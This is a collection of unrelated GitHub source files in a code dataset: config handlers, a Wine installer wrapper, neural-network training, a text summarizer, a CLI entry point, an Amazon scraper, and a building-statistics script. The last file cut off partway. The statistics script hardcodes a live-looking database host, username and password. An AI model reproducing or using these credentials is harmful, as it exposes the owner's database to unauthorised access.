list[Any], optional\n :return: The value of the specified argument in kwargs, or the default value if not present.\n :rtype: Any\n :raises: ArgumentError: If the specified argument is required and not present in kwargs,\n or if the argument value is not in the list of valid choices.\n \"\"\"\n value = kwargs.get(name, default)\n if value is _MISSING:\n critical(f'Missing required argument \"{name}\" in {kwargs}.', ArgumentError)\n if choices is not None and value not in choices:\n critical(f'Argument \"{name}\" must be one of {choices}, got {value}.', ArgumentError)\n\n return value\n\n\nLoadingHandler = Callable[[dict], dict]\n\"\"\"\nA loading handler is a callable that takes a dictionary containing configuration data as input\nand returns a dictionary containing configuration data as output. It can be used to transform or\nfilter configuration data during loading.\n\nThe final handler returns a dict containing the KEY_RESULT key, the value associated is the dict are\nlist final configuration data.\n\"\"\"\n\nLazyHandler = Callable[[dict], dict]\n\"\"\"\nA lazy handler is a callable that takes a dictionary containing configuration data as input\nand returns a dictionary containing configuration data as output. It can be used to transform or\nfilter configuration data lazily, i.e. on-demand when the data is accessed for the first time.\n\"\"\"\n\n\ndef from_source(params: dict) -> dict:\n \"\"\"\n Load configuration data from a string source.\n\n :param params: A dictionary containing parameters for loading configuration data.\n The dictionary must contain the following keys:\n - 'text': The string containing the configuration data to load.\n - 'format': The format of the configuration data.\n :type params: dict\n :return: A dictionary containing the loaded configuration data under the KEY_RESULT key.\n :rtype: dict\n \"\"\"\n source_text = get_argument(params, 'text')\n source_format = get_argument(params, 'format')\n params[KEY_RESULT] = load_string(source_text, source_format)\n return params\n\n\ndef get_file_handler(directory: Union[PathLike, str] = DEFAULT_PATH, key: bytes = None) -> LoadingHandler:\n \"\"\"\n Get a handler for loading configuration data from a file.\n\n :param directory: The directory where the configuration file is located. Defaults to the current directory.\n :type directory: Union[PathLike, str]\n :param key: Optional encryption key for encrypted configuration files. Defaults to None.\n :type key: bytes, optional\n :return: A callable that takes a dictionary containing parameters for loading configuration data\n from a file, and returns a dictionary containing the loaded configuration data under\n the KEY_RESULT key.\n :rtype: LoadingHandler\n :raises: NotADirectoryError if the specified directory does not exist.\n \"\"\"\n directory = Path(directory)\n if not directory.exists():\n critical(str(directory), NotADirectoryError)\n\n if key is not None:\n load = partial(load_encrypted_file, key=key)\n else:\n load = load_file\n\n def handler(params: dict) -> dict:\n file_path = directory / get_argument(params, 'path', DEFAULT_CONFIG_PATH)\n params['full_path'] = file_path\n params[KEY_RESULT] = load(file_path)\n return params\n\n return handler\n\n\ndef _find_suitable_file(directory: Path, config_name: str) -> str:\n \"\"\"\n Find a suitable configuration file in the specified directory.\n\n :param directory: The directory where the configuration files are located. Defaults to the current directory.\n :type directory: Union[PathLike, str]\n :param config_name: The name of the configuration file.\n :type config_name: str\n :return: The name of the configuration file found in the directory.\n :rtype: str\n :raises: FileNotFoundError if no suitable configuration file is found in the directory.\n \"\"\"\n for filename in os.listdir(directory):\n if isinstance(filename, bytes):\n filename = filename.decode()\n\n if filename == config_name:\n return config_name\n\n if filename.split('.')[0] == config_name:\n return filename\n raise FileNotFoundError(f'Cannot find a suitable configuration file for \"{config_name}\" in \"{str(directory)}\".')\n\n\ndef get_find_suitable_file_handler(directory: Union[PathLike, str] = DEFAULT_PATH) -> LazyHandler:\n \"\"\"\n Get a handler for finding a suitable configuration file.\n\n :param directory: The directory where the configuration files are located. Defaults to the current directory.\n :type directory: Union[PathLike, str]\n :return: A callable that takes a dictionary containing parameters for finding a suitable configuration file,\n and returns a dictionary containing the path of the configuration file found in the directory.\n :rtype: LazyHandler\n :raises: NotADirectoryError if the specified directory does not exist.\n \"\"\"\n directory = Path(directory)\n if not directory.exists():\n critical(str(directory), NotADirectoryError)\n\n def handler(params: dict) -> dict:\n config_name = get_argument(params, 'name')\n params['path'] = _find_suitable_file(directory, config_name)\n return params\n\n return handler\n","repo_name":"Leikt/gemtools-config","sub_path":"src/gemtoolsconfig/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":6546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8422472609","text":"import os\nimport glob\n\nimport Project\nimport Tools\nimport Qt\nimport Git\nimport Svn\n\nclass Wine:\n def __init__(self):\n if Tools.isLinuxOS():\n self.wine = 'wine'\n self.prefix = '%s/.wine' % ( os.environ[ 'HOME' ] )\n elif Tools.isMacOS():\n self.wine = '/Applications/Wine.app/Contents/Resources/bin/wine'\n self.prefix = '%s/Wine Files' % ( os.environ[ 'HOME' ] )\n elif Tools.isWindowsOS():\n '''No wine needed'''\n \n self.rootDrive = 'z:'\n self.drive = '%s/drive_c' % ( self.prefix )\n self.programFiles = '%s/Program Files' % ( self.drive )\n \n def start(self, command, workingDirectory = None):\n return Tools.execute( '\"%s\" %s' % ( self.wine, command ), workingDirectory )\n \n def iscc(self, scriptFile, workingDirectory = None):\n return self.start( '\"%s/Inno Setup 5/ISCC.exe\" \"%s\"' % ( self.programFiles, scriptFile ), workingDirectory )\n \n def isccInstall(self, filePath):\n if not os.path.exists( filePath ):\n return False\n return self.start( '\"%s%s\" /silent' % ( self.rootDrive, filePath ) )\n \n def isccUninstall(self, filePath):\n if not os.path.exists( filePath ):\n return False\n if os.path.isdir( filePath ):\n for file in glob.glob( '%s/unins*.exe' % ( filePath ) ):\n if not self.isccUninstall( file ):\n return False\n return True\n else:\n return self.start( '\"%s%s\" /silent' % ( self.rootDrive, filePath ) )\n \n def isccSetupToZip(self, setupFilePath, zipFilePath, defaultInstallDirectory):\n pf = '%s/%s' % ( self.programFiles, defaultInstallDirectory )\n sl = os.path.splitext( zipFilePath )[ 0 ]\n self.isccUninstall( pf )\n if not self.isccInstall( setupFilePath ):\n return False\n ok = Tools.createSymLink( pf, sl )\n if ok:\n ok = Tools.zipFolder( sl, zipFilePath, exclude = '*unins*.*' )\n Tools.deleteIfExists( sl )\n self.isccUninstall( pf )\n return ok\n \n def expandVariables(self):\n os.environ[ 'WINE_BINARY' ] = self.wine\n os.environ[ 'WINEPREFIX' ] = self.prefix # official used variable by wine binary\n os.environ[ 'WINE_PREFIX' ] = self.prefix\n os.environ[ 'WINE_ROOT_DRIVE' ] = self.rootDrive\n os.environ[ 'WINE_DRIVE' ] = self.drive\n os.environ[ 'WINE_PROGRAM_FILES' ] = self.programFiles","repo_name":"pasnox/monkeystudio2","sub_path":"tools/project_releaser/src/Wine.py","file_name":"Wine.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"72"} +{"seq_id":"9505356405","text":"# SNN's Training :\r\n\r\nimport numpy as np\r\nimport utility as ut\r\n\r\n\r\n# Save weights and MSE of the SNN\r\ndef save_w_dl(W_ae, W_sf, ann_MSE):\r\n np.savez('w_ae.npz', *W_ae)\r\n np.savez('w_sf.npz', W_sf)\r\n np.savetxt(\"costo.csv\", ann_MSE)\r\n\r\n\r\ndef create_momentum(W, L):\r\n W_size = L + 1\r\n V = [None] * W_size\r\n\r\n for i in range(1, W_size):\r\n V[i] = np.zeros_like(W[i])\r\n\r\n return V\r\n\r\n\r\ndef get_minibatch(x, y, n, M):\r\n lower_bound = n * M\r\n upper_bound = (n + 1) * M\r\n\r\n x_batch = x[:, lower_bound: upper_bound]\r\n y_batch = y[:, lower_bound: upper_bound]\r\n\r\n return x_batch, y_batch\r\n\r\n\r\ndef cross_entropy_cost(a, y):\r\n M = y.shape[1]\r\n cost = - (np.sum(y * np.log(a)) / M)\r\n return cost\r\n\r\n\r\n# Calculate Softmax\r\ndef softmax(z):\r\n exp_z = np.exp(z - np.max(z))\r\n return exp_z / exp_z.sum(axis=0, keepdims=True)\r\n\r\n\r\n# Training miniBatch for softmax\r\ndef train_sft_batch(x, y, W, V, S, param):\r\n N = x.shape[1]\r\n M = param['M_batch']\r\n nBatch = N // M\r\n mse = []\r\n\r\n for n in range(nBatch):\r\n xe, ye = get_minibatch(x, y, n, M)\r\n\r\n z = W @ xe\r\n act = softmax(z)\r\n e = ye - act\r\n costo = cross_entropy_cost(act, ye)\r\n mse.append(costo)\r\n\r\n gW = - ((e @ xe.T) / M)\r\n W, V, S = ut.applyAdam(param['mu'], V, S, gW, W, n)\r\n\r\n return W, V, S, mse\r\n\r\n\r\n# Softmax's training via SGD with Momentum\r\ndef train_softmax(x, y, param):\r\n W = ut.iniW(y.shape[0], x.shape[0])\r\n V = np.zeros_like(W)\r\n S = np.zeros_like(W)\r\n Costo = []\r\n\r\n for i in range(param['max_iter']):\r\n idx = np.random.permutation(x.shape[1])\r\n xe, ye = x[:, idx], y[:, idx]\r\n W, V, S, cost = train_sft_batch(xe, ye, W, V, S, param)\r\n\r\n Costo.append(np.mean(cost))\r\n\r\n if (i % 50) == 0:\r\n print(i, Costo[-1])\r\n\r\n return W, Costo\r\n\r\n\r\ndef init_ann(hidden_nodes, d, m):\r\n \"\"\"\r\n Initialize an ANN with its variables saved into a map.\r\n :param hidden_nodes: List with the nodes quantity by layer.\r\n :param d: Size of the input\r\n :param m: Size of the output\r\n \"\"\"\r\n ann = ut.create_ann(hidden_nodes)\r\n ann['W'] = ut.iniWs(ann['W'], ann['L'], d, m, hidden_nodes)\r\n\r\n return ann\r\n\r\n\r\n# miniBatch-SGDM's Training\r\ndef trn_minibatch(x, y, ann, param, V, S):\r\n N = x.shape[1]\r\n M = param['M_batch']\r\n nBatch = N // M\r\n mse = []\r\n for n in range(nBatch):\r\n xe, ye = get_minibatch(x, y, n, M)\r\n\r\n act = ut.forward(ann, param, xe)\r\n e = act - ye\r\n costo = ut.get_mse(act, ye)\r\n mse.append(costo)\r\n de_dw = ut.gradW(ann, param, e)\r\n ann['W'], V, S = ut.updWV_rmsprop(ann, param, de_dw, V, S, n)\r\n\r\n return ann['W'], V, S, mse\r\n\r\n\r\n# SAE's Training\r\ndef train_sae(X, param_ae):\r\n d, N = X.shape\r\n ae = init_ann(param_ae['ae_nodes'], d, d)\r\n V = create_momentum(ae['W'], ae['L'])\r\n S = create_momentum(ae['W'], ae['L'])\r\n\r\n for i in range(param_ae['max_iter']):\r\n xe = X[:, np.random.permutation(N)]\r\n ae['W'], V, S, mse = trn_minibatch(xe, xe, ae, param_ae, V, S)\r\n\r\n if (i % 10) == 0:\r\n print(i, np.mean(mse))\r\n\r\n a = X.copy()\r\n for l in range(1, param_ae['ae_n_layers'] + 1):\r\n a = ut.act_function(param_ae['g_fun'], ae['W'][l] @ a)\r\n \r\n return ae['W'][:param_ae['ae_n_layers'] + 1], a\r\n\r\n\r\n# Load data to train the SNN\r\ndef load_data_trn():\r\n FILE_X = 'dtrn.csv'\r\n FILE_Y = 'etrn.csv'\r\n X_train, y_train = ut.load_data(FILE_X, FILE_Y)\r\n return X_train, y_train\r\n\r\n\r\n# Beginning ...\r\ndef main():\r\n param_ae = ut.load_cnf_ae()\r\n param_soft = ut.load_cnf_softmax()\r\n xe, ye = load_data_trn()\r\n W_ae, xe = train_sae(xe, param_ae)\r\n W_sf, Cost = train_softmax(xe, ye, param_soft)\r\n save_w_dl(W_ae, W_sf, Cost)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"DanRivaille/AE-Softmax-Pinversa","sub_path":"trn.py","file_name":"trn.py","file_ext":"py","file_size_in_byte":3641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16908959836","text":"import spacy\nfrom spacy.lang.en.stop_words import STOP_WORDS\nfrom string import punctuation\n# Used to rank sentences according sentence scores\nfrom heapq import nlargest\n\ndef estimated_reading_time(text):\n '''Calculating reading speed by dividing \n text length by average reading speed (avg words per pm)'''\n mins = int(len(text)/200)\n seconds = int((float(len(text)/200) - mins)*60)\n return \"( Estimated reading time: {} mins, {} seconds )\".format(str(mins),str(seconds))\n\ndef summarizer(text):\n '''Summarizes text by tokenizing, creating a word frequency list, \n finding sentence scores, and then selecting sentences with \n highest sentence scores'''\n\n stopwords = list(STOP_WORDS)\n #print(stopwords)\n\n # Loading model for tokenization\n nlp = spacy.load('en_core_web_sm')\n\n # Tokenizing text with spacy\n doc = nlp(text)\n\n tokens = [token.text for token in doc]\n #print(tokens)\n\n # Finding Word Frequencies\n word_frequencies = {}\n\n for word in doc:\n if word.text.lower() not in stopwords:\n if word.text.lower() not in punctuation:\n if word.text.lower() not in word_frequencies.keys():\n # Adding new word to word_frequency\n word_frequencies[word.text.lower()] = 1\n else:\n # Incrementing frequency in word already exists\n word_frequencies[word.text.lower()] += 1\n\n #print(word_frequencies)\n\n # Normalizing Word Frequencies\n max_frequency = max(word_frequencies.values())\n #print(max_frequency)\n\n for word in word_frequencies.keys():\n word_frequencies[word] /= max_frequency\n\n #print(word_frequencies)\n\n # Sentence Tokenization\n sentence_tokens = [sent for sent in doc.sents]\n #print(sentence_tokens)\n\n # Calculating sentence scores\n sentence_scores = {}\n\n for sent in sentence_tokens:\n for word in sent:\n if word.text.lower() in word_frequencies.keys():\n if sent not in sentence_scores.keys():\n sentence_scores[sent] = word_frequencies[word.text.lower()]\n else:\n sentence_scores[sent] += word_frequencies[word.text.lower()]\n\n #print(sentence_scores)\n\n # Getting Sentences with highest scores\n sentences_percent = 0.2\n sentences_selected = int(len(sentence_tokens)*sentences_percent)\n #print(sentences_selected)\n\n #heapq.nlargest(selectCount, iterable, keys )\n summary_sentences = nlargest(sentences_selected, sentence_scores, key = sentence_scores.get)\n #print(summary_sentences)\n summary_sentences = [word.text for word in summary_sentences]\n summary = \" \".join(summary_sentences)\n return summary\n\n","repo_name":"Mohit-Kundu/Text-Summarization-Web-Application","sub_path":"summarizer.py","file_name":"summarizer.py","file_ext":"py","file_size_in_byte":2749,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"41058442996","text":"#!/usr/bin/env python\n# =============================================================================\n# Minet CLI Endpoint\n# =============================================================================\n#\n# CLI enpoint of the Minet library.\n#\nimport csv\nimport sys\nimport signal\nimport shutil\nimport importlib\nimport multiprocessing\nfrom textwrap import dedent\nfrom argparse import (\n ArgumentParser,\n RawTextHelpFormatter\n)\n\nfrom minet.__version__ import __version__\nfrom minet.cli.utils import die\n\nfrom minet.cli.commands import MINET_COMMANDS\n\n# Handling pipes correctly\nsignal.signal(signal.SIGPIPE, signal.SIG_DFL)\n\nSUBPARSERS = {}\n\n# Getting terminal size\nterminal_size = shutil.get_terminal_size()\n\n# Increasing max CSV file limit to avoid pesky issues\ncsv.field_size_limit(sys.maxsize)\n\n# Hiding stack traces on ctrl+c\nsignal.signal(signal.SIGINT, lambda x, y: sys.exit(1))\n\n\ndef custom_formatter(prog):\n return RawTextHelpFormatter(\n prog,\n max_help_position=50,\n width=terminal_size.columns,\n )\n\n\ndef omit(d, key_to_omit):\n nd = {}\n\n for k, v in d.items():\n if k == key_to_omit:\n continue\n\n nd[k] = v\n\n return nd\n\n\ndef get_subparser(o, keys):\n parser = None\n\n for key in keys:\n item = o.get(key)\n\n if item is None:\n return None\n\n parser = item['parser']\n\n if 'subparsers' in item:\n o = item['subparsers']\n else:\n break\n\n return parser\n\n\ndef add_arguments(subparser, arguments):\n for argument in arguments:\n if 'name' in argument:\n subparser.add_argument(argument['name'], **omit(argument, 'name'))\n elif 'flag' in argument:\n subparser.add_argument(argument['flag'], **omit(argument, 'flag'))\n else:\n subparser.add_argument(*argument['flags'], **omit(argument, 'flags'))\n\n\ndef build_description(command):\n description = command['title'] + '\\n' + ('=' * len(command['title']))\n\n description += '\\n\\n' + dedent(command.get('description', ''))\n\n return description\n\n\ndef build_subparsers(parser, index, commands, help='Action to execute', title='actions',\n dest='action', common_arguments=[]):\n\n subparser_index = {}\n\n subparsers = parser.add_subparsers(\n help=help,\n title=title,\n dest=dest\n )\n\n for name, command in commands.items():\n subparser = subparsers.add_parser(\n name,\n description=build_description(command),\n epilog=dedent(command.get('epilog', '')),\n formatter_class=custom_formatter,\n aliases=command.get('aliases', [])\n )\n\n to_index = {\n 'parser': subparser,\n 'command': command,\n 'subparsers': {}\n }\n\n add_arguments(subparser, common_arguments)\n\n if 'arguments' in command:\n add_arguments(subparser, command['arguments'])\n\n if 'subparsers' in command:\n subsubparsers = command['subparsers']\n subcommon_arguments = subsubparsers.get('common_arguments', [])\n\n add_arguments(subparser, subcommon_arguments)\n\n build_subparsers(\n subparser,\n to_index['subparsers'],\n subsubparsers['commands'],\n help=subsubparsers['help'],\n title=subsubparsers['title'],\n dest=subsubparsers['dest'],\n common_arguments=common_arguments + subcommon_arguments\n )\n\n if 'aliases' in command:\n for alias in command['aliases']:\n index[alias] = to_index\n\n index[name] = to_index\n\n return subparsers\n\n\ndef build_parser(commands):\n\n # Building the argument parser\n parser = ArgumentParser(prog='minet')\n\n parser.add_argument('--version', action='version', version='minet %s' % __version__)\n\n subparser_index = {}\n\n subparsers = build_subparsers(parser, subparser_index, commands)\n\n # Help subparser\n help_subparser = subparsers.add_parser('help')\n help_subparser.add_argument('subcommand', help='Name of the subcommand', nargs='*')\n\n return parser, subparser_index\n\n\ndef main():\n\n # Building parser\n parser, subparser_index = build_parser(MINET_COMMANDS)\n\n # Parsing arguments and triggering commands\n args = parser.parse_args()\n\n action = subparser_index.get(args.action)\n\n if action is not None:\n\n # Need to check something?\n if 'before' in action['command']:\n action['command']['before']()\n\n # Lazy loading module for faster startup\n m = importlib.import_module(action['command']['package'])\n fn = getattr(m, action['command']['action'])\n\n fn(args)\n\n elif args.action == 'help':\n\n if len(args.subcommand) == 0:\n parser.print_help()\n return\n\n target = get_subparser(subparser_index, args.subcommand)\n\n if target is None:\n die('Unknow command \"%s\"' % ' '.join(args.subcommand))\n else:\n target.print_help()\n\n else:\n parser.print_help()\n\n\nif __name__ == '__main__':\n multiprocessing.freeze_support()\n main()\n","repo_name":"AleksiKnuutila/minet-fork","sub_path":"cli/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":5201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7033154766","text":"from bs4 import BeautifulSoup\r\nimport requests\r\n\r\nheaders = {\r\n 'User-Agent': 'Mozilla/6.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'\r\n}\r\n\r\nurl = 'https://www.amazon.es/s?k=tarjeta+grafica&i=computers&rh=n%3A667049031%2Cp_36%3A1323857031&s=review-rank&dc&__mk_es_ES=%C3%85M%C3%85%C5%BD%C3%95%C3%91&crid=95HP1H4872EX&qid=1645126858&rnid=1323854031&sprefix=tarjeta+grafica%2Caps%2C87&ref=sr_st_review-rank'\r\npage = requests.get(url, headers=headers)\r\nsoup = BeautifulSoup(page.content, 'html.parser')\r\n\r\n#Nombre tarjeta grafica\r\n\r\ntg = soup.find_all('span', class_=\"a-size-medium a-color-base a-text-normal\")\r\n\r\ntarjetas = list()\r\n\r\ncount = 0\r\n\r\nfor i in tg:\r\n if count < 10: \r\n tarjetas.append(i.text)\r\n else:\r\n break\r\n count = count + 1\r\n\r\n\r\n\r\n#Valoracion\r\n\r\nvl = soup.find_all('span', class_=\"a-icon-alt\")\r\n\r\nvaloracion = list()\r\n\r\ncount = 0\r\n\r\nfor i in vl:\r\n if count < 10:\r\n valoracion.append(i.text)\r\n else:\r\n break\r\n count = count + 1\r\n\r\n\r\n\r\n#Precio\r\n\r\npr = soup.find_all('span', class_=\"a-price-whole\")\r\n\r\nprecios = list()\r\n\r\ncount = 0\r\n\r\nfor i in pr:\r\n\r\n if count < 10:\r\n precios.append(i.text)\r\n else:\r\n break\r\n count = count + 1\r\n\r\n\r\n\r\n#Caracteristicas\r\n\r\ntr = soup.find_all('div', class_=\"sg-col sg-col-0-of-12 sg-col-4-of-16 sg-col-2-of-20 s-padding-right-small\")\r\n\r\ncar = list()\r\ncarac = list()\r\ncount = 1\r\n\r\nfor i in tr:\r\n if count < 42: \r\n t = i.find('span', class_= \"a-text-bold\")\r\n car.append(t.text) \r\n else:\r\n break\r\n count = count + 1\r\n\r\nfor f in range(10):\r\n carac.append([0]*4)\r\naux = 0\r\nfor t in range(10):\r\n for c in range(4):\r\n carac[t][c] = car[aux]\r\n aux = aux + 1\r\n \r\n\r\narchivo = open(\"Tarjetas.txt\",\"w\")\r\nfor i in range(10):\r\n archivo.write( \"NOMBRE: \" + tarjetas[i]+'\\n'+ \"VALORACION: \"+valoracion[i] + '\\n' +\"PRECIO EN EUROS: \" + precios[i] + '\\n')\r\n archivo.write( \"Tamaño de RAM \" + \"Tipo de RAM \" + \"Tarjeta grafica \" + \"Velocidad de memoria \" + '\\n')\r\n for j in range(4):\r\n archivo.write(carac[i][j] + \" \")\r\n archivo.write('\\n'+ '\\n' + '\\n') \r\n \r\n\r\narchivo.close()\r\n","repo_name":"Matiamor/webscraping","sub_path":"TarjetasGraficas/PythonApplication1.py","file_name":"PythonApplication1.py","file_ext":"py","file_size_in_byte":2299,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"8734706286","text":"#problem 1290 / convert binary number in a linked list to integer\nclass Solution(object):\n def getDecimalValue(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: int\n \"\"\"\n res = 0\n while head:\n res *= 2\n res += head.val\n head = head.next\n return res","repo_name":"digitalladder/leetcode","sub_path":"problem1290.py","file_name":"problem1290.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24024547839","text":"import psycopg2\nimport csv\n\ndef getReferencies(cursor):\n cursor.execute(\"SELECT REFCAT, SECC_CENSAL, IMMB_US_PRN, IMMB_TIPUS, IMMB_TIPUS_PERCENT, UNI_PLURI_CORR, NUM_V, \"\n \"PLURI_NUM_V, ORD, ANYCONST_SUP_V, ANYCONST_ETAPA_SUP_V, AL_V_MAX, AL_IMMB, SEGMENT_100, SEGMENT_10,\"\n \"SUP_SBR, SUP_VIV_SBR, SUP_VIV_IND, SUP_VIV_STR, SUP_TOTAL FROM referencies_alpha;\")\n return cursor.fetchall()\n\ndef getRef(cursor, refcat):\n cursor.execute(\"SELECT * FROM referencies_alpha WHERE REFCAT = '{}';\".format(refcat))\n return cursor.fetchall()\n\n\nconn_string = \"host='prodtestdb.czciosgdrat6.eu-west-1.rds.amazonaws.com' dbname='dbprodtest' user='testuser' password='CICLICAc1cl1c4'\"\nprint(\"Connecting to database\\n\t->%s\" % (conn_string))\nconn = psycopg2.connect(conn_string)\ncursor = conn.cursor()\n\nconjuntRef = set(getReferencies(cursor))\n\nconn.commit()\ncursor.close()\nconn.close()\n\naeg = []\nsaed = []\nsaetc = []\nconjuntRefAEG = 0\nmunicipis = {}\nerror1 = []\nplanolRef = {}\n\nwith open(\"SeccCensals_AEG.csv\") as csvfile:\n ambitreader = csv.reader(csvfile, delimiter=\",\")\n next(ambitreader)\n for i in ambitreader:\n aeg.append(i[0])\n\nwith open(\"SeccCensals_SAED.csv\") as csvfile3:\n ambitreader1 = csv.reader(csvfile3, delimiter=\",\")\n next(ambitreader1)\n for i in ambitreader1:\n saed.append(i[0])\n\nwith open(\"SeccCensals_SAETC.csv\") as csvfile4:\n ambitreader2 = csv.reader(csvfile4, delimiter=\",\")\n next(ambitreader2)\n for i in ambitreader2:\n saetc.append(i[0])\n\nwith open(\"SeccCensals_Municipis_totes.csv\") as csvfile2:\n munireader = csv.reader(csvfile2, delimiter=\";\")\n next(munireader)\n for r in munireader:\n seccCensalsMuni = []\n for r in munireader:\n if r[1] not in municipis:\n municipis[r[1]] = [r[0]]\n else:\n municipis[r[1]].append(r[0])\n\ncountImmb = 0\ncountImmb_VIV = 0\ncountViv = 0\ncountSUP_TOTAL = 0\ncountSUP_SBR = 0\ncountSUP_VIV_SBR = 0\ncountError = 0\ncountImmb_AEG = 0\ncountImmb_VIV_AEG = 0\ncountViv_AEG = 0\ncountSUP_TOTAL_AEG = 0\ncountSUP_SBR_AEG = 0\ncountSUP_VIV_SBR_AEG = 0\ncountError_AEG = 0\ncountImmb_SAED = 0\ncountImmb_VIV_SAED = 0\ncountViv_SAED = 0\ncountSUP_TOTAL_SAED = 0\ncountSUP_SBR_SAED = 0\ncountSUP_VIV_SBR_SAED = 0\ncountError_SAED = 0\ncountImmb_SAETC = 0\ncountImmb_VIV_SAETC = 0\ncountViv_SAETC = 0\ncountSUP_TOTAL_SAETC = 0\ncountSUP_SBR_SAETC = 0\ncountSUP_VIV_SBR_SAETC = 0\ncountError_SAETC = 0\n\n#################################################### Analisi variables #################################################\nfor r in conjuntRef:\n r = list(r)\n if r[4] is not None:\n r[4] = float(r[4])\n if r[15] is not None:\n r[15] = float(r[15])\n if r[16] is not None:\n r[16] = float(r[16])\n if r[17] is not None:\n r[17] = float(r[17])\n if r[18] is not None:\n r[18] = float(r[18])\n if r[19] is not None:\n r[19] = float(r[19])\n if r[6] is not None and r[16] > 0:\n r[6] = int(r[6])\n else:\n r[6] = 0\n if r[1] in aeg and r[5] != \"P_CORR\" and r[17]*10 <= r[16] and ((r[3] != \"IMMB_NO_V\" and r[16] > 0) or\n r[3] == \"IMMB_NO_V\"):\n countImmb_AEG += 1\n countSUP_TOTAL_AEG += r[19]\n countSUP_SBR_AEG += r[15]\n if r[16] > 0:\n countImmb_VIV_AEG += 1\n countViv_AEG += r[6]\n countSUP_VIV_SBR_AEG += r[16]\n if r[1] in saed and r[5] != \"P_CORR\" and r[17]*10 <= r[16] and ((r[3] != \"IMMB_NO_V\" and r[16] > 0) or\n r[3] == \"IMMB_NO_V\"):\n countImmb_SAED += 1\n countSUP_TOTAL_SAED += r[19]\n countSUP_SBR_SAED += r[15]\n if r[16] > 0:\n countImmb_VIV_SAED += 1\n countViv_SAED += r[6]\n countSUP_VIV_SBR_SAED += r[16]\n if r[1] in saetc and r[5] != \"P_CORR\" and r[17]*10 <= r[16] and ((r[3] != \"IMMB_NO_V\" and r[16] > 0) or\n r[3] == \"IMMB_NO_V\"):\n countImmb_SAETC += 1\n countSUP_TOTAL_SAETC += r[19]\n countSUP_SBR_SAETC += r[15]\n if r[16] > 0:\n countImmb_VIV_SAETC += 1\n countViv_SAETC += r[6]\n countSUP_VIV_SBR_SAETC += r[16]\n if r[1] != \"\" and r[5] != \"P_CORR\" and r[17]*10 <= r[16] and ((r[3] != \"IMMB_NO_V\" and r[16] > 0) or\n (r[3] == \"IMMB_NO_V\" and r[16] == 0)):\n countImmb += 1\n if r[16] > 0:\n countImmb_VIV += 1\n countViv += r[6]\n countSUP_VIV_SBR += r[16]\n countSUP_TOTAL += r[19]\n countSUP_SBR += r[15]\n\n#################################################### Print #############################################################\nprint(\"TOTAL:\")\nprint(\"Immb\", end=\": \")\nprint(countImmb)\nprint(\"Immb_VIV\", end=\": \")\nprint(countImmb_VIV)\nprint(\"Viv\", end=\": \")\nprint(countViv)\nprint(\"SUP_TOTAL\", end=\": \")\nprint(countSUP_TOTAL)\nprint(\"SUP_SBR\", end=\": \")\nprint(countSUP_SBR)\nprint(\"SUP_VIV_SBR\", end=\": \")\nprint(countSUP_VIV_SBR)\nprint(\"ErrorsIndeterminat i P_CORR\", end=\": \")\nprint(countError)\nprint(\"\")\nprint(\"AEG:\")\nprint(\"Immb\", end=\": \")\nprint(countImmb_AEG)\nprint(\"Immb_VIV\", end=\": \")\nprint(countImmb_VIV_AEG)\nprint(\"Viv\", end=\": \")\nprint(countViv_AEG)\nprint(\"SUP_TOTAL\", end=\": \")\nprint(countSUP_TOTAL_AEG)\nprint(\"SUP_SBR\", end=\": \")\nprint(countSUP_SBR_AEG)\nprint(\"SUP_VIV_SBR\", end=\": \")\nprint(countSUP_VIV_SBR_AEG)\nprint(\"ErrorsIndeterminat i P_CORR\", end=\": \")\nprint(countError_AEG)\nprint(\"\")\nprint(\"SAED:\")\nprint(\"Immb\", end=\": \")\nprint(countImmb_SAED)\nprint(\"Immb_VIV\", end=\": \")\nprint(countImmb_VIV_SAED)\nprint(\"Viv\", end=\": \")\nprint(countViv_SAED)\nprint(\"SUP_TOTAL\", end=\": \")\nprint(countSUP_TOTAL_SAED)\nprint(\"SUP_SBR\", end=\": \")\nprint(countSUP_SBR_SAED)\nprint(\"SUP_VIV_SBR\", end=\": \")\nprint(countSUP_VIV_SBR_SAED)\nprint(\"ErrorsIndeterminat i P_CORR\", end=\": \")\nprint(countError_SAED)\nprint(\"\")\nprint(\"SAETC:\")\nprint(\"Immb\", end=\": \")\nprint(countImmb_SAETC)\nprint(\"Immb_VIV\", end=\": \")\nprint(countImmb_VIV_SAETC)\nprint(\"Viv\", end=\": \")\nprint(countViv_SAETC)\nprint(\"SUP_TOTAL\", end=\": \")\nprint(countSUP_TOTAL_SAETC)\nprint(\"SUP_SBR\", end=\": \")\nprint(countSUP_SBR_SAETC)\nprint(\"SUP_VIV_SBR\", end=\": \")\nprint(countSUP_VIV_SBR_SAETC)\nprint(\"ErrorsIndeterminat i P_CORR\", end=\": \")\nprint(countError_SAETC)\n\n","repo_name":"adriamartinvilaseca/Proves","sub_path":"CountAmbitEstudi.py","file_name":"CountAmbitEstudi.py","file_ext":"py","file_size_in_byte":6462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28342417476","text":"def data_prep(data):\n import pandas as pd\n import numpy as np\n \n filepath = \"../Data/important_50_X.csv\"\n\n imp_var = pd.read_csv(filepath)\n\n NAs_cols = ['NumberOfBankruptciesFiled',\n 'NumberOfBankruptciesDischarged',\n 'NumberOfBankruptciesDismissed',\n 'NumberOfBankruptciesDisposed',\n 'mortgageinquiriespast3months',\n 'mortgageinquiriespast6months',\n 'HighestbalanceofopenVAloan_1MO',\n 'CumulativebalancesofopenVAloan_1MO',\n '30daylatepast3months_1MO',\n 